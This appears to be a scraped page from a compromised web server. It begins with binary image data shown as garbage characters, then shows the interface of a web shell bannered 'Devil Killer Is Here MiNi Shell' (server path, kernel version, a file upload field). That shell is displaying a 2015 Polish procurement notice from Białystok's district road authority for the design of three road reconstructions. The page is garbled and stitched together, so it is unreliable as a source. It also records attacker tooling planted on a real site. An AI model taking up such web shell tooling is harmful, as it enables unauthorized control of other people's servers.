JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150515/114850-N-2015.html

<p class="kh_header"><b>Białystok: Opracowanie trzech drogowych dokumentacji projektowych 
  Zadanie I. - Przebudowę z rozbudową drogi powiatowej nr 1469 B  
 na odcinku Protasy - Folwarki małe i drogi powiatowej Nr 1470 B Folwarki Małe          - Zabłuów   (Gm. Zabłudów)
  Zadanie II. - Przebudowę z rozbudową drogi powiatowej Nr 1393 B na odcinku
                        Dobrzyniewo Duże - Ogrodniki (Gm. Dobrzyniewo Duże) 
  Zadanie III. - Przebudowę z rozbudową drogi powiatowej nr 1489 B  
                       na odcinku Pasynki - Zagruszany  (Gm. Zabłudów)</b><br>
<b>Numer ogłoszenia: 114850 - 2015; data zamieszczenia: 15.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Białymstoku , Zaścianki, Szosa Baranowicka 37, 15-522 Białystok, woj. podlaskie, tel. (085) 740-21-49, 740-22-17, faks (085) 740-22-19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie trzech drogowych dokumentacji projektowych 
  Zadanie I. - Przebudowę z rozbudową drogi powiatowej nr 1469 B  
 na odcinku Protasy - Folwarki małe i drogi powiatowej Nr 1470 B Folwarki Małe          - Zabłuów   (Gm. Zabłudów)
  Zadanie II. - Przebudowę z rozbudową drogi powiatowej Nr 1393 B na odcinku
                        Dobrzyniewo Duże - Ogrodniki (Gm. Dobrzyniewo Duże) 
  Zadanie III. - Przebudowę z rozbudową drogi powiatowej nr 1489 B  
                       na odcinku Pasynki - Zagruszany  (Gm. Zabłudów).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej na:
  Zadanie I. - Przebudowę z rozbudową drogi powiatowej nr 1469 B  
                       na odcinku Protasy - Folwarki małe i drogi powiatowej Nr 1470 B Folwarki Małe            - Zabłuów   (Gm. Zabłudów)
  Zadanie II. - Przebudowę z rozbudową drogi powiatowej Nr 1393 B na odcinku
                        Dobrzyniewo Duże - Ogrodniki (Gm. Dobrzyniewo Duże) 
  Zadanie III. - Przebudowę z rozbudową drogi powiatowej nr 1489 B  
                       na odcinku Pasynki - Zagruszany  (Gm. Zabłudów).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: Dla zadań I , II i III - 2 dokumentacji projektowych odpowiadających swoim rodzajem przedmiotowi zamówienia tj. każda dokumentacja dotyczące projektu budowy lub przebudowy drogi/ulicy o długości min. 500,00 m wraz z kanalizacja deszczową długości min. 100 m  dla których uzyskano pozwolenie na budowę i jednego projektu budowy lub przebudowy przepustu o średnicy min. 0,8 m , dla którego uzyskano pozwolenie na budowę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca przedstawi wraz z ofertą osoby, które spełniają następujące wymagania: Dla zadań I , II i III 
1)min. jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie : - projektant powinien posiadać uprawnienia projektowe w specjalności drogi bez ograniczeń lub im równoważne. - projektant powinien zrealizować min.2 dokumentacje projektowe dotyczące projektu budowy lub przebudowy drogi/ulicy o długości min. 500,00 m dla których uzyskano pozwolenie na budowę
2) min. 1 osoba posiadająca uprawnienia projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych , gazowych , wodociągowych i kanalizacyjnych (bez ograniczeń) lub im równoważne</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykazać usługi na potwierdzenie spełnienia warunków udziału w postępowaniu;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożnością dotrzymania terminów określonych w formularzu cenowym, termin ten może ulec przedłużeniu, nie więcej jednak, niż o czas trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzd.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego, pokój nr 17 lub za pośrednictwem poczty lub na w/p stronie internetowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2015 godzina 09:50, miejsce: Siedziba Zamawiającego pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na: Przebudowę z rozbudową drogi powiatowej nr 1469 B  na odcinku Protasy - Folwarki małe i drogi powiatowej Nr 1470 B Folwarki Małe - Zabłuów   (Gm. Zabłudów).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący (dane ewidencyjne podlegające weryfikacji przez Projektanta)
1.1.	Szerokość istniejącej jezdni i korona
Droga Nr 1469 B - od km 0+000 (linia rozgraniczająca drogi krajowej nr 19) do km ok. 8+700; szer. jezdni: 5,0 - 6,0m, szer. korony drogi 8,0 - 9,5m, jezdnia bitumiczna.
Droga Nr 1470 B  - od km 0+000 (skrzyżowanie z drogą Nr 1469 B) do km ok. 3+000 - przekrój trasowy, szer. jezdni: 5,0m, szer. korony drogi 8,0 - 9,0m; jezdnia bitumiczna.  
1.2.	Rodzaj i stan istniejącej jezdni wykorzystywanej jako podbudowa
Konstrukcję jezdni należy zbadać pod kątem wykorzystania na podbudowę drogi. 
1.3.	Sytuacja trasy
Uporządkowana, wymaga niewielkich korekt. 
1.4.	Obiekty inżynierskie
Przepusty:
Droga Nr 1469 B:
-  5 przepustów żelbetowych, w tym: 3szt. O 0,60m, 1 szt. O 0,80m; 1 szt. 2 O 0,80m - do przebudowy

Droga Nr 1470 B:
-  2 przepusty żelbetowe, w tym: 1szt. O 0,70m; 1 szt. O 0,60m - do przebudowy 
 
1.5.	Niweleta drogi
Niweleta drogi wymaga korekt.
1.6.	Stan rowów i innych urządzeń odwadniających
Odwodnienie drogi wymaga:
renowacji rowów przydrożnych,
przebudowy przepustów pod koroną drogi z dostosowaniem do migracji małych zwierząt (dot. przepustów na ciekach),
budowy przepustów w obrębie skrzyżowań z drogami bocznymi,
budowa przepustów pod koroną ścieżki rowerowej z dostosowaniem do migracji małych zwierząt (dot. przepustów na ciekach),
budowy odcinkowej kanalizacji deszczowej  w m. Rafałówka.

2.	DANE WYJŚCIOWE DO PROJEKTOWANIA - DROGA

2.1.	Wnioskowany charakter robót: przebudowa z rozbudową 
2.2.	Parametry techniczne do projektowania 
2.2.1. Prędkość projektowa Vp   -  w terenie zabudowanym - 40 lub 30 km/h - w terenie niezabudowanym - 50 lub 40 km/h 
2.2.2. Klasa drogi                       -   L 
2.2.3. Przekrój poprzeczny (normalny):
w m. Rafałówka - uliczny, szerokość jezdni 6,00m; obustronne ścieżki rowerowe z dopuszczeniem ruchu pieszego szer. po 2,5m,
w m.  Dobrzyniówka -  obustronne ścieżki rowerowe z dopuszczeniem ruchu pieszego szer. po 2,5m,
poza terenem zabudowanym - przekrój szlakowy, szer. jezdni 5,50m,  szerokość korony drogi 8,0m; poza rowami, na niezależnym korpusie dwukierunkowa ścieżka rowerowa - początek ścieżki rowerowej w km ok. 0+850 (połączenie drogi powiatowej z drogą gminną do m. Kuriany).
  2.3.  Konstrukcja (technologia) nawierzchni:  
2.3.1.	Kategoria ruchu - należy określić na podstawie prognozy ruchu w 10 roku eksploatacji przyjmując 2017 rok za rok wyjściowy i dane z przeprowadzonych pomiarów ruchu.
2.3.2	Podbudowa - kruszywowa; istniejąca lub nowa
2.3.3.	Nawierzchnia drogi i ścieżki rowerowej poza terenami zabudowanymi - beton asfaltowy  
2.4. Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu
Rozwiązanie skrzyżowań z drogami gminnymi.  Rozwiązanie skrzyżowania z drogą powiatową Nr  1471 B (Rafałówka - Kamionka - Zajezierce). Jeden zjazd do jednej działki w uzgodnionej z właścicielem lokalizacji. Zatoki autobusowe w lokalizacji uzgodnionej komisyjnie. Komisję, na wniosek wykonawcy dokumentacji, powoła Zamawiający. Utwardzone dojścia (chodniki) do zatok autobusowych.  
Renowacja rowów wg potrzeb, przebudowa przepustów, budowa przepustów, budowa  przepustów w obrębie skrzyżowań i pod koroną ścieżki rowerowej, ew. budowa odcinkowej sieci kanalizacji deszczowej w m. Rafałówka.  
2.5.	Propozycje dotyczące zadrzewienia
Przewidzieć do wycinki wszystkie drzewa zagrażające bezpieczeństwu ruchu lub kolidujące z przebudową drogi.
Drzewa przewidziane do wycinki należy ponumerować na mapie syt-wys.
Przewidzieć do wycinki i karczowania zbędne zakrzaczenie. Przewidzieć do usunięcia wszystkie karcze.
2.6.	  Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy urządzeń obcych.  
W przypadku stwierdzenia kolizji, ustalić z Zamawiającym zakres przełożenia urządzeń obcych oraz formę zapłaty za opracowanie branżowe.
3.    ZAKRES OPRACOWANIA
3.1.	Opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnienia do pozwolenia na budowę. Zamawiający przewiduje uzyskanie zgody na realizację inwestycji drogowej w ramach  Specustawy drogowej. Projekt wykonać na aktualnej mapie do celów projektowych. Tytuł projektu budowlanego uzgodnić z Zamawiającym.
Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  	porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich, rowów przydrożnych, ogrodzeń trwałych i nietrwałych,
- 		obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego,
-  	wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych),
-  	opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- 	rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Białymstoku.
Zamawiający wymaga, aby do mapy do celów projektowych były dołączone dokumenty dotyczące lokalizacji i rzędnych reperów państwowych/roboczych, w odniesieniu do których określono rzędne wykazane na mapie oraz układu odniesienia.
3.2. Dodatkowo należy opracować:
       -     operaty wodnoprawne - przebudowa/budowa przepustów, ew. budowa wylotu kanalizacji deszczowej, odprowadzenie wód opadowych do wód lub do ziemi, uzgodnione w WZMiUW w Białymstoku ul. Handlowa 6,
       -     badania geotechniczne podłoża nawierzchni wykonane co 100m, a w przypadku gruntów 
             wątpliwych z częstotliwością umożliwiającą opracowanie przekroi   geologicznych,
       -     pomiary ruchu i prognozę ruchu na 20 lat
-	projekt stałej organizacji ruchu, 
-	plan wyrębu drzew i krzewów uwzględniający wycinkę drzew i krzewów z terenów leśnych.
 Dokumentację należy przekazać:

            a. Materiały do opiniowania ze Specustawy drogowej  
                wraz z naniesionymi na mapę projektowanymi 
               podziałami działek                                                                                        - 6 egz.
            b. mapa do celów projektowych w skali 1:500                                                 - 1 egz.
c. Projekt budowlany                                                                                       - 4 egz.
      d. Projekt wykonawczy (techniczny) branża drogowa 
          z częścią przedmiarową i ST                                                                       - 5 egz. 
      e. Projekt wykonawczy (techniczny) branża techniczna (przebudowa/budowa 
          przepustów pod koroną drogi i ścieżki rowerowej) z częścią przedmiarową 
           i ST                                                                                                                - 5 egz.
      f. Projekt wykonawczy (techniczny) branża sanitarna (budowa odcinkowej 
         sieci kanalizacji deszczowej)   z częścią przedmiarową i ST                          - 5 egz.
     g. Operaty wodnoprawne (przebudowa/budowa przepustów, odprowadzenie 
         wód opadowych do wód lub do ziemi) wersja papierowa   - po 3egz. 
         + wersja elektroniczna - po 2 płytki
      h. Badania geotechniczne podłoża nawierzchni                        	                   - 2 egz. 
i. Plan wyrębu drzew i krzewów                                                                      - 3 egz.
j. Projekt stałej organizacji ruchu                                                                     - 4 egz.   
k. Pomiary ruchu i prognoza ruchu                                                                    - 2 egz.
 

             Obowiązuje wersja elektroniczna całej dokumentacji projektowej  - 1 płyta


Obowiązuje przedstawienie do dnia 14.08.2015r. koncepcji w wersji elektronicznej   zawierającej rozwiązania sytuacyjne i wysokościowe (zagospodarowanie terenu, profil podłużny drogi z projektowaną niweletą), do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych.

Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale 6.
3.3. Terminy przekazania Zamawiającemu elementów zamówienia zostały określone w formularzu cenowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na:
 Przebudowę z rozbudową drogi powiatowej Nr 1393 B na odcinku Dobrzyniewo Duże - Ogrodniki (Gm. Dobrzyniewo Duże).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący (dane ewidencyjne podlegające weryfikacji przez Projektanta)
1.1	Szerokość istniejącej jezdni i korona
Od km rob. 0+000 (granica pasa drogowego drogi krajowej Nr 65) do km rob. ok. 3+050 (początek inwestycji w m. Nowe Aleksandrowo zrealizowanej w 2014r., przy szer. jezdni min. 5,5m)
- przekrój uliczny, półuliczny i szlakowy,
- szer. jezdni od 5,0m do 6,0m; nawierzchnia beton asfaltowy i powierzchniowe utrwalenie nawierzchni żwirowej. 
1.2	Rodzaj i stan istniejącej jezdni wykorzystywanej jako podbudowa
Konstrukcję jezdni należy zbadać pod kątem wykorzystania na podbudowę drogi.
1.3	Sytuacja trasy
Uporządkowana, wymaga niewielkich korekt. 
1.4	Obiekty inżynierskie
Przepusty:
-  4 przepusty żelbetowe, w tym: 1szt. 2 O 1,25m, L=8,0m; 1 szt. 2 O 0,80m, L=10,0m; 1 szt. O 1,50m, L= 9,0m; 1 szt. O 0,60m, L=10,0m
 
1.5	Niweleta drogi
Niweleta drogi wymaga niewielkich korekt.
1.6	Stan rowów i innych urządzeń odwadniających
Odwodnienie drogi wymaga:
renowacji rowów przydrożnych,
przebudowy przepustów pod koroną drogi z dostosowaniem do migracji małych zwierząt (dot. przepustów na ciekach) oraz odbioru wód opadowych z jezdni drogi,  
budowy przepustów w obrębie skrzyżowań z drogami bocznymi,
budowy studzienek ściekowych z wyprowadzeniem wód opadowych do rowu przydrożnego,
zastosowania obniżonych ścieków przykrawężnikowych w m. Dobrzyniewo Koście, Ogrodniki i ew. w m. Dobrzyniewo Duże.

2	DANE WYJŚCIOWE DO PROJEKTOWANIA - DROGA
2.1	 Wnioskowany charakter robót: przebudowa z rozbudową 
2.2	  Parametry techniczne do projektowania 
2.2.1. Prędkość projektowa Vp   -  w terenie zabudowanym - 40 lub 30 km/h - w terenie niezabudowanym - 50 lub 40 km/h 
2.2.2. Klasa drogi                       -   L 
2.2.3. Przekrój poprzeczny (normalny):
w miejscowości Dobrzyniewo Duże, Dobrzyniewo Kościelne i na odcinku zwartej zabudowy w m. Ogrodniki uliczny, szerokość jezdni 6,00m; szerokość chodników pożądana 1,5m.   
na pozostałych odcinkach - przekrój półuliczny, szer. jezdni min. 5,50m,  szerokość pobocza 1,25m, szerokość chodnika min. 1,5m. 
  2.3.  Konstrukcja (technologia) nawierzchni:  
2.3.2.	Kategoria ruchu - należy określić na podstawie prognozy ruchu w 10 roku eksploatacji przyjmując 2017 rok za rok wyjściowy i dane z przeprowadzonych pomiarów ruchu.
2.2.1	Podbudowa - kruszywowa; istniejąca lub nowa
2.3.4.	Nawierzchnia - beton asfaltowy  
2.4. Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu
